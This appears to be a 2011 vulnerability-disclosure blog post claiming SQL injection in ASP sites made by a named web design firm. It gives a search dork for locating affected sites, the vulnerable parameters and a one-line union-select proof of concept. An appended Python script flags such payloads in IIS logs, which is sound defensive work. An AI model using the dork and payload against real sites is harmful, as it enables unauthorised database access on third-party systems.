Tuesday, March 8, 2011

Web Design by Webz Vulnerable to SQL Injection


Title : Web Design by Webz Vulnerable to SQL Injection
Web : http://www.webz.com.my/
Found by: p0pc0rn 08/03/2011
Dork : intext:"Web Design by Webz" filetype:asp



SQL - Microsoft JET Database Engine error
------------------------------------------

http://site.com/xxx.asp?id=[SQL]
http://site.com/xxx.asp?catID=[SQL]
http://site.com/xxx.asp?brandID=[SQL]

Other parameters are also vulnerable to SQL injection.

POC
---

http://site.com/xxx.asp?id=1 union select 1 from test.a


thanks,
-p0pc0rn-
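
For defenders checking IIS logs for requests like the ones listed above, here is an added example (not part of the original advisory) that flags requests to .asp pages where id, catID or brandID carry anything other than digits. The log layout, the sample lines and the assumption that these IDs are always numeric are constructed for illustration.

```python
from urllib.parse import parse_qsl

# Parameter names taken from the advisory; it notes that others are affected
# too, so extend this set for the site being monitored.
WATCHED = {"id", "catid", "brandid"}

# Constructed sample in IIS W3C extended format (documentation IP ranges).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2011-03-08 10:01:02 192.0.2.10 GET /products.asp catID=4&brandID=12 200
2011-03-08 10:01:09 198.51.100.7 GET /products.asp id=1+union+select+1+from+test.a 500
2011-03-08 10:01:15 198.51.100.7 GET /news.asp brandID=12x 500
2011-03-08 10:02:00 192.0.2.10 GET /about.asp - 200
2011-03-08 10:02:30 192.0.2.44 GET /style.css id=abc 200
"""

def non_numeric_ids(query):
    """Return (name, decoded value) for watched parameters that are not plain digits."""
    if query in ("", "-"):          # IIS logs "-" for an empty query string
        return []
    pairs = parse_qsl(query, keep_blank_values=True)   # decodes + and %XX
    return [(k, v) for k, v in pairs
            if k.lower() in WATCHED and not (v.isascii() and v.isdigit())]

def scan(log_text):
    """Return one finding per offending parameter in requests to .asp pages."""
    cols, findings = {}, []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            # Column order is set by the header, so index fields by name.
            cols = {name: i for i, name in enumerate(line.split()[1:])}
            continue
        if not line or line.startswith("#") or not cols:
            continue
        f = line.split()
        if len(f) != len(cols) or not f[cols["cs-uri-stem"]].lower().endswith(".asp"):
            continue
        for name, value in non_numeric_ids(f[cols["cs-uri-query"]]):
            # The status is kept for triage: an error response next to a
            # non-numeric ID deserves a closer look at that page.
            findings.append({"ip": f[cols["c-ip"]], "page": f[cols["cs-uri-stem"]],
                             "param": name, "value": value,
                             "status": int(f[cols["sc-status"]])})
    return findings

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same digits-only rule belongs in the ASP page itself, applied before the value reaches any query.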